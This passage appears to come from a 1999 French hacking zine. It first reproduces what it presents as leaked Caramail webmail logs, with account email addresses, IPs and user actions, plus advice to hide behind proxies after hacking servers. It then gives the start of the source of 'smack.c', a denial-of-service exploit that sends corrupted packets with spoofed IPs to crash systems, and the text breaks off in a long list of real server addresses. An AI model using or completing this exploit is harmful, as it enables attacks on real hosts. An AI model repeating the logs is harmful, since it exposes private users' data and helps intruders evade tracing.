26/10/1999 04:32 61 TPA49 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 04:32 61 LOK27 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 04:32 61 LOK26 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 04:32 61 PLZ02 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 04:32 61 LOK24 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 04:33 61 CLM24 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 04:33 61 CLM25 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 04:33 61 EMP01 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 04:33 61 TPA49 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 04:33 61 CSW14 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 04:34 61 EMP01 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Composition message 26/10/1999 04:34 61 LOK24 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 04:36 61 CLM24 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 04:36 61 LOK27 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 04:38 61 EMP01 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 04:38 61 LOK24 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 04:38 61 MUS25 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 04:40 61 PLZ02 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 04:41 61 CLM24 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Composition message 26/10/1999 04:41 61 CLM25 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 04:56 60 PMS01 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu des folders 26/10/1999 04:56 61 LOK25 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 04:56 61 FRE04 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 04:57 61 TPA45 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 04:57 61 PLZ02 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 04:57 61 PLZ02 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 04:57 61 PLZ02 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 04:57 61 LOK24 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Composition message 26/10/1999 04:58 61 CSW14 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 05:05 61 PLZ02 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 05:05 61 MUS25 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 05:05 61 TPA49 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 05:05 61 TPA46 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 05:05 61 TPA48 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 05:05 61 TPA49 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Composition message 26/10/1999 05:06 61 TPA45 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 05:07 61 CLM24 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 05:08 61 TPA49 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Composition message 26/10/1999 05:08 61 TPA46 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 05:09 61 PLZ02 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 05:25 61 CSW16 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 05:25 61 TPA49 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Composition message 26/10/1999 05:26 61 PLZ02 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 05:26 61 PLZ02 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 05:26 61 TPA49 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 05:26 61 TPA47 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 05:26 61 TPA45 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 05:26 61 CLM25 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Composition message 26/10/1999 05:27 61 PLZ02 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 05:33 60 PMS01 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu des folders 26/10/1999 05:33 61 PLZ02 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 05:33 61 CSW13 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 05:34 61 PLZ01 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Composition message 26/10/1999 05:35 61 PLZ02 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 05:38 61 CLM24 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 05:38 61 TPA49 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Composition message 26/10/1999 05:39 61 CLM25 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 05:39 61 CSW14 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 05:42 61 PLZ02 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Composition message 26/10/1999 05:43 61 PLZ02 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 05:44 61 JDI01 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 05:44 61 LOK27 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Composition message 26/10/1999 05:45 61 MUS25 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 05:53 61 LOK27 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 05:53 61 FRE04 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Composition message 26/10/1999 05:54 61 PLZ02 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 05:54 61 MUS25 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 05:59 61 CLM25 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Composition message 26/10/1999 05:59 61 TPA49 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 06:05 61 PMS02 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 06:05 61 TPA46 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Composition message 26/10/1999 06:06 61 PMS01 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 06:06 61 TPA45 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 06:07 61 EMP01 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Composition message 26/10/1999 06:07 61 EMP01 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 06:07 61 CLM24 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 06:08 61 EMP01 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 06:08 61 TPA46 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 06:08 61 PLZ02 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Composition message 26/10/1999 06:09 61 PLZ02 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Composition message 26/10/1999 06:10 61 PLZ02 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 06:12 7 TPA48 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Pager 26/10/1999 06:20 60 PLZ02 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu des folders 26/10/1999 06:20 61 TPA45 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 06:20 61 PLZ02 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 06:39 61 PLZ02 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 06:39 61 JDI01 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 06:39 61 LOK27 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 09:17 60 LOK26 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu des folders 26/10/1999 09:17 7 CLM24 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Pager 26/10/1999 09:17 7 CLM25 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Dialogue en direct 26/10/1999 09:33 61 TPA48 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) etc.... Logs pour le compte : glamor@caramail.com ---------- LOKACENG_PUB_991026 26/10/1999 19:39 60 CDI08 206.172.241.105 206.172.241.105 Mozilla/4.6 [fr]C-SYMPA (Win95; I) glamor Contenu des folders 26/10/1999 19:40 7 COL01 206.172.241.105 206.172.241.105 Mozilla/4.6 [fr]C-SYMPA (Win95; I) glamor Dialogue en direct 26/10/1999 19:54 61 CDI08 206.172.241.105 206.172.241.105 Mozilla/4.6 [fr]C-SYMPA (Win95; I) glamor Composition message 26/10/1999 19:55 61 EMP01 206.172.241.105 206.172.241.105 Mozilla/4.6 [fr]C-SYMPA (Win95; I) glamor Attacher un fichier 26/10/1999 19:58 61 CDI08 206.172.241.105 206.172.241.105 Mozilla/4.6 [fr]C-SYMPA (Win95; I) glamor Composition message 26/10/1999 19:59 61 COL01 206.172.241.105 206.172.241.105 Mozilla/4.6 [fr]C-SYMPA (Win95; I) glamor Contenu du dossier Boite de reception 26/10/1999 20:01 61 CDI08 206.172.241.105 206.172.241.105 Mozilla/4.6 [fr]C-SYMPA (Win95; I) glamor Affiche body du mail 26/10/1999 20:02 7 COL01 206.172.241.105 206.172.241.105 Mozilla/4.6 [fr]C-SYMPA (Win95; I) glamor Téléchargement de Fichier 26/10/1999 20:03 61 PLZ02 206.172.241.105 206.172.241.105 Mozilla/4.6 [fr]C-SYMPA (Win95; I) glamor Affiche body du mail 26/10/1999 20:06 61 TPA47 206.172.241.105 206.172.241.105 Mozilla/4.6 [fr]C-SYMPA (Win95; I) glamor Contenu du dossier Eléments envoyés 26/10/1999 20:06 61 PLZ02 206.172.241.105 206.172.241.105 Mozilla/4.6 [fr]C-SYMPA (Win95; I) glamor Affiche body du mail 26/10/1999 20:06 61 FRE04 206.172.241.105 206.172.241.105 Mozilla/4.6 [fr]C-SYMPA (Win95; I) glamor Composition message etc..... Logs pour le compte : fleche.patrick@caramail.com ---------- LOKACENG_PUB_991026 26/10/1999 00:50 60 PLZ02 212.166.36.254 212.166.36.254 Mozilla/4.0 (compatible; MSIE 4.01; Windows 95) fleche.patrick Contenu des folders 26/10/1999 00:50 7 CLM24 212.166.36.254 212.166.36.254 Mozilla/4.0 (compatible; MSIE 4.01; Windows 95) fleche.patrick Dialogue en direct 26/10/1999 01:10 7 LOK25 212.166.36.254 212.166.36.254 Mozilla/4.0 (compatible; MSIE 4.01; Windows 95) fleche.patrick Boite aux lettres 26/10/1999 01:10 61 LOK24 212.166.36.254 212.166.36.254 Mozilla/4.0 (compatible; MSIE 4.01; Windows 95) fleche.patrick Contenu du dossier Boite de reception 26/10/1999 01:10 60 TPA47 212.166.36.254 212.166.36.254 Mozilla/4.0 (compatible; MSIE 4.01; Windows 95) fleche.patrick Contenu des folders 26/10/1999 19:44 60 TPA47 212.166.36.254 212.166.36.254 Mozilla/4.0 (compatible; MSIE 4.01; Windows 95) fleche.patrick Contenu des folders 26/10/1999 19:44 7 RDV02 212.166.36.254 212.166.36.254 Mozilla/4.0 (compatible; MSIE 4.01; Windows 95) fleche.patrick Dialogue en direct 26/10/1999 19:48 7 COL01 212.166.36.254 212.166.36.254 Mozilla/4.0 (compatible; MSIE 4.01; Windows 95) fleche.patrick Boite aux lettres 26/10/1999 19:48 61 TPA46 212.166.36.254 212.166.36.254 Mozilla/4.0 (compatible; MSIE 4.01; Windows 95) fleche.patrick Contenu du dossier Boite de reception 26/10/1999 19:48 60 JDI01 212.166.36.254 212.166.36.254 Mozilla/4.0 (compatible; MSIE 4.01; Windows 95) fleche.patrick Contenu des folders 26/10/1999 23:59 60 TPA49 212.166.36.254 212.166.36.254 Mozilla/4.0 (compatible; MSIE 4.01; Windows 95) fleche.patrick Contenu des folders etc.... Logs pour le compte : epicurien06@caramail.com (petites-levres) ---------- LOKACENG_PUB_991026 26/10/1999 07:13 60 LOK25 164.138.223.166 164.138.223.166 Mozilla/4.0 (compatible; MSIE 5.0; Windows 95; DigExt) epicurien06 Contenu des folders 26/10/1999 07:13 61 REC01 164.138.223.166 164.138.223.166 Mozilla/4.0 (compatible; MSIE 5.0; Windows 95; DigExt) epicurien06 Contenu du dossier Boite de reception 26/10/1999 07:14 61 LOK25 164.138.223.166 164.138.223.166 Mozilla/4.0 (compatible; MSIE 5.0; Windows 95; DigExt) epicurien06 Affiche body du mail 26/10/1999 07:15 61 CSW13 164.138.223.166 164.138.223.166 Mozilla/4.0 (compatible; MSIE 5.0; Windows 95; DigExt) epicurien06 Composition message 26/10/1999 07:15 61 LOK25 164.138.223.166 164.138.223.166 Mozilla/4.0 (compatible; MSIE 5.0; Windows 95; DigExt) epicurien06 Attacher un fichier 26/10/1999 07:17 61 PLZ02 164.138.223.166 164.138.223.166 Mozilla/4.0 (compatible; MSIE 5.0; Windows 95; DigExt) epicurien06 Composition message 26/10/1999 07:17 61 LOK27 164.138.223.166 164.138.223.166 Mozilla/4.0 (compatible; MSIE 5.0; Windows 95; DigExt) epicurien06 Attacher un fichier 26/10/1999 07:17 61 CLM25 164.138.223.166 164.138.223.166 Mozilla/4.0 (compatible; MSIE 5.0; Windows 95; DigExt) epicurien06 Composition message 26/10/1999 07:17 61 FRE04 164.138.223.166 164.138.223.166 Mozilla/4.0 (compatible; MSIE 5.0; Windows 95; DigExt) epicurien06 Attacher un fichier 26/10/1999 07:18 61 MUS25 164.138.223.166 164.138.223.166 Mozilla/4.0 (compatible; MSIE 5.0; Windows 95; DigExt) epicurien06 Composition message 26/10/1999 07:18 61 TPA46 164.138.223.166 164.138.223.166 Mozilla/4.0 (compatible; MSIE 5.0; Windows 95; DigExt) epicurien06 Contenu du dossier Boite de reception 26/10/1999 07:18 61 CSW16 164.138.223.166 164.138.223.166 Mozilla/4.0 (compatible; MSIE 5.0; Windows 95; DigExt) epicurien06 Contenu du dossier Eléments envoyés 26/10/1999 07:18 61 CSW14 164.138.223.166 164.138.223.166 Mozilla/4.0 (compatible; MSIE 5.0; Windows 95; DigExt) epicurien06 Affiche body du mail 26/10/1999 07:19 61 PLZ02 164.138.223.166 164.138.223.166 Mozilla/4.0 (compatible; MSIE 5.0; Windows 95; DigExt) epicurien06 Contenu du dossier Boite de reception 26/10/1999 07:19 61 MUS25 164.138.223.166 164.138.223.166 Mozilla/4.0 (compatible; MSIE 5.0; Windows 95; DigExt) epicurien06 Affiche body du mail 26/10/1999 07:19 61 FRE04 164.138.223.166 164.138.223.166 Mozilla/4.0 (compatible; MSIE 5.0; Windows 95; DigExt) epicurien06 Composition message 26/10/1999 07:20 61 MUS25 164.138.223.166 164.138.223.166 Mozilla/4.0 (compatible; MSIE 5.0; Windows 95; DigExt) epicurien06 Attacher un fichier 26/10/1999 07:20 61 PLZ02 164.138.223.166 164.138.223.166 Mozilla/4.0 (compatible; MSIE 5.0; Windows 95; DigExt) etc..... Logs pour le compte : carole13@caramail.com ---------- LOKACENG_PUB_991026 26/10/1999 09:31 60 CLM24 164.138.18.233 164.138.18.233 Mozilla/4.0 (compatible; MSIE 5.0; Windows NT) carole13 Contenu des folders 26/10/1999 09:31 61 EMP01 164.138.18.233 164.138.18.233 Mozilla/4.0 (compatible; MSIE 5.0; Windows NT) carole13 Contenu du dossier Boite de reception 26/10/1999 09:31 61 PLZ02 164.138.18.233 164.138.18.233 Mozilla/4.0 (compatible; MSIE 5.0; Windows NT) carole13 Affiche body du mail ---------- LOKACENG_PUB_991101 ---------- LOKACENG_PUB_991121 ---------- I:\LOKACENG_PUB_991209 09/12/1999 14:05 60 ZOJ05 164.138.143.170 164.138.143.170 Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt) carole13 Contenu des folders 09/12/1999 14:06 61 ZOJ05 164.138.143.170 164.138.143.170 Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt) etc..... Ce qui prouve aussi que caramail logge tous ses users avec leurs Ip et toutes les actions effectuees donc si par exemple vous hackez un serveur puis que vous laissez votre adresse email de chez caramail,vaut mieux utiliser un proxy ou un wingate pour lire votre courrier.... Si vous voulez le fichier complet envoyez moi un mail : asmodeus@mail.be 8.Faire planter un serveur avec un flood icmp ********************************************* /* smack.c [code released - Oct 23rd 1998 by - Iron-lungs] Derive: Base sur un vieil exploit D.O.S. pour crasher les serveurs quake. Resume: il envoie des paquets ICMP corrompus à partir d'Ip differentes- Resultat: Plantage des plateformes windows et de certains systemes Unix,BSD,etc... l'envoi d'un millier de paquets provoque le plantage des connexions ftp,telnet ,navigateur et d'autres clients aussi (IRC,ICQ...) Essayez cet exploit avec la methode :"ex: ./smack 127.0.0.1 ; ./smack 127.0.0.1 " */ #include #include #include #include #include #include #include #include #include #include #include #include char conn_pack0[] = { -128,0,0,12,1,81,85,65,75,69,0,3 }; char conn_pack1[] = { -1,-1,-1,-1,99,111,110,110,101,99,116,32,34,92,110,111, 97,105,109,92,48,92,109,115,103,92,49,92,114,97,116, 101,92,50,53,48,48,92,98,111,116,116,111,109,99,111, 108,111,114,92,49,98,92,116,111,112,99,111,108,111,114, 92,110,97,109,101,92,83,110,111,111,112,121,34,10 }; #define PS0 20+8+12 #define PS1 20+8+strlen(conn_pack1) char *servers[] = { "129.15.3.38:26000:0", "207.123.126.4:26000:0", "129.15.3.38:26001:0", "129.15.3.38:26002:0", "192.107.41.7:26000:0", "157.182.246.58:26000:0", "128.52.42.22:26000:0", "209.51.213.12:26000:0", "209.112.14.200:26000:0", "144.92.218.112:26000:0", "200.239.253.14:26000:0", "146.227.105.5:26000:0", "209.12.13.20:26000:0", "134.147.141.98:26000:0", "137.48.127.127:26000:0", "209.51.192.228:26000:0" "159.134.244.134:26000:0", "207.229.129.193:26000:0", "194.125.2.219:26001:0", "206.98.138.162:26000:0", "134.193.111.241:26000:0", "207.40.196.13:26000:0", "209.26.6.121:26000:0", "208.194.67.16:26000:0", "205.163.58.20:26000:0", "199.247.156.6:26000:0", "12.72.1.37:26000:0", "216.65.157.101:26000:0", "206.103.0.200:26000:0", "207.198.211.22:26000:0", "148.176.238.89:26000:0", "208.255.165.53:26000:0", "208.240.197.32:26000:0", "209.192.31.148:26000:0", "159.134.244.132:26000:0", "195.96.122.8:26000:0", "209.30.67.88:26000:0", "209.36.105.50:26000:0", "62.136.15.45:26000:0", "208.18.129.2:26000:0", "208.0.188.6:26000:0", "208.137.128.24:26000:0", "198.106.23.1:26000:0", "209.122.33.45:26000:0", "208.23.24.79:26000:0", "200.34.211.10:26000:0", "208.45.42.111:26000:0", "203.23.47.43:26000:0", "207.239.192.51:26000:0", "165.166.140.122:26000:0", "207.19.125.13:26000:0", "144.92.229.122:26000:0", "199.202.71.203:26000:0", "200.255.244.2:26000:0", "207.30.184.9:26000:0", "129.186.121.53:26000:0", "204.210.15.71:26000:0", "198.101.39.41:26000:0", "203.45.23.123:26000:0", "205.23.45.223:26000:0", "34.224.14.118:26000:0", "200.24.34.116:26000:0", "133.45.342.124:26000:0", "192.52.220.101:26000:0", "194.126.80.142:26000:0", "206.171.181.1:26000:0", "208.4.5.9:26000:0", "206.246.194.16:26000:0", "205.139.62.15:26000:0", "204.254.98.15:26000:0", "207.206.116.41:26000:0", "208.130.10.26:26000:0", "207.126.70.69:26000:0", "38.241.229.103:26000:0", "204.170.191.6:26000:0", "144.92.243.243:26000:0", "144.92.111.117:26000:0", "194.229.103.195:26000:0", "208.134.73.42:26000:0", "207.64.79.1:26000:0", "171.64.65.70:26004:0", "207.13.110.4:26000:0", "204.253.208.245:26000:0", "165.166.144.45:26000:0", "128.252.22.47:26000:0", "204.210.15.71:26001:0", "193.88.50.50:26000:0", "209.155.24.25:26000:0", "204.49.131.19:26000:0", "199.67.51.102:26000:0", "207.114.144.200:26000:0", "165.166.140.140:26000:0", "38.233.80.136:26000:0", "204.216.57.249:26000:0", "199.72.175.4:26000:0", "204.91.237.250:26000:0", "206.191.0.209:26000:0", "194.109.6.220:26000:0", "207.67.188.25:26000:0", "160.45.32.176:26000:0", "206.246.194.15:26000:0", "207.65.182.12:26000:0", "204.213.176.8:26000:0", "207.99.85.67:26000:0", "209.172.129.66:26000:0", "132.230.63.23:26000:0", "206.149.144.14:26000:0", "147.188.209.113:26000:0", "204.141.86.42:26000:0", "207.8.164.27:26000:0", "204.254.98.11:26000:0", "204.216.126.251:26000:0", "207.206.65.5:26000:0", "209.12.170.11:26000:0", "131.111.226.98:26000:0", "194.65.5.103:26000:0", "204.202.54.95:26000:0", "204.97.179.4:26000:0", "24.0.147.54:26000:0", "207.170.48.24:26000:0", "199.217.218.8:26000:0", "207.166.192.85:26000:0", "206.154.148.145:26000:0", "206.248.16.16:26000:0", "200.241.188.3:26000:0", "204.177.71.10:26000:0", "140.233.207.207:26000:0", "207.218.51.13:26000:0", "194.109.6.217:26000:0", "207.236.41.30:26000:0", "195.162.196.42:26000:0", "209.49.51.98:26020:0", "198.106.166.188:26000:0", "207.239.212.113:26000:0", "165.91.3.91:26000:0", "128.95.25.184:26666:0", "128.2.237.78:26001:0", "128.2.237.78:26003:0", "207.254.73.2:26000:0", "208.225.207.3:26666:0", "171.64.65.70:26666:0", "208.225.207.3:26001:0", "128.2.237.78:26000:0", "129.21.113.71:26000:0", "195.74.96.45:26000:0", "206.129.112.27:26000:0", "199.67.51.101:26000:0", "38.156.101.2:26000:0", "204.177.39.44:26000:0", "207.173.16.53:26000:0", "207.175.30.130:26123:0", "128.52.38.15:26000:0", "204.49.131.19:26666:0", "129.21.114.129:26666:0", "128.2.237.78:26002:0", "18.238.0.24:26001:0", "140.247.155.208:26000:0", "208.137.139.8:26000:0", "141.219.81.85:26000:0", "208.203.244.13:26000:0", "208.137.128.24:26020:0", "140.180.143.197:26666:0", "205.189.151.3:26000:0", "199.247.126.23:26000:0", "18.238.0.24:26002:0", "206.98.138.166:26000:0", "128.2.74.204:26000:0", "198.87.96.254:26000:0", "204.209.212.5:26000:0", "207.171.0.68:26002:0", "159.134.244.133:26000:0", "195.170.128.5:26000:0", "198.164.230.15:26000:0", "130.236.249.227:26000:0", "193.88.50.50:26001:0", "143.44.100.20:26000:0", "129.15.3.39:26000:0", "205.219.23.3:26000:0", "205.177.27.190:26000:0", "207.172.7.66:26000:0", "209.144.56.16:26000:0", "128.164.141.5:26000:0", "129.2.237.36:26000:0", "206.98.138.165:26000:0", "194.100.105.71:26000:0", "194.158.161.28:26000:0", "203.87.2.13:26000:0", "141.219.83.69:26000:0", "198.83.6.70:26000:0", "35.8.144.96:26000:0", "206.196.57.130:26000:0", "206.31.102.16:26000:0", "207.23.43.3:26000:0", "207.18.86.50:26000:0", "207.87.203.20:26000:0", "198.161.102.213:26000:0", "24.1.226.74:26000:0", "207.207.32.130:26000:0", "165.166.140.160:26000:0", "204.248.210.20:26000:0", "207.87.203.28:26000:0", "165.166.140.111:26000:0", "24.3.132.9:26000:0", "205.217.206.189:26000:0", "207.99.85.69:26000:0", "192.124.43.75:26000:0", "199.72.175.156:26000:0", "209.98.3.217:26000:0", "206.154.138.8:26000:0", "205.199.137.12:26000:0", "204.177.184.31:26000:0", "192.124.43.73:26000:0", "171.64.65.70:26000:0", "165.91.21.113:26000:0", "198.17.249.14:26000:0", "156.46.147.17:26000:0", "207.13.5.18:26000:0", "208.212.201.9:26000:0", "207.96.243.5:26000:0", "206.196.153.201:26000:0", "204.171.58.6:26000:0", "140.180.143.197:26000:0", "207.3.64.52:26000:0", "207.65.218.15:26000:0", "194.42.225.247:26000:0", "205.228.248.27:26000:0", "204.216.126.250:26000:0", "128.230.33.90:26000:0", "128.163.161.105:26000:0", "208.0.122.12:26000:0", "206.53.116.243:26000:0", "199.76.206.54:26000:0", "194.239.134.18:26000:0", "208.153.58.17:26000:0", "206.147.58.45:26000:0", "204.220.36.31:26000:0", "207.239.212.107:26000:0", "206.230.18.20:26000:0", "195.18.128.10:26000:0", "151.198.193.6:26000:0", "208.0.122.11:26000:0", "206.149.80.99:26000:0", "207.239.212.244:26000:0", "129.128.54.168:26000:0", "194.229.154.41:26000:0", "207.51.86.22:26000:0", "207.201.91.8:26000:0", "205.216.83.5:26000:0", "208.201.224.211:26000:0", "194.144.237.50:26000:0", "147.83.61.32:26000:0", "136.201.40.50:26000:0", "132.235.197.72:26000:0", "195.173.25.34:26000:0", "194.143.8.153:26000:0", "194.109.6.218:26000:0", "18.238.0.24:26000:0", "129.21.112.194:26000:0", "128.253.185.87:26000:0", "206.183.143.4:26000:0", "130.234.16.21:26000:0", "148.202.1.5:26000:0", "167.114.26.50:26000:0", "169.197.1.154:26000:0", "207.0.164.8:26000:0", "207.243.123.2:26000:0", "207.106.42.14:26000:0", "198.161.102.18:26000:0", "202.218.50.24:26000:0", "205.139.35.22:26000:0", "193.74.114.41:26000:0", "199.217.218.008:26000:0", "129.15.3.37:26000:0", "130.240.195.72:26000:0", "205.164.220.20:26000:0", "209.90.128.16:26000:0", "200.241.222.88:26000:0", "194.213.72.22:26000:0", "206.112.1.31:26000:0", 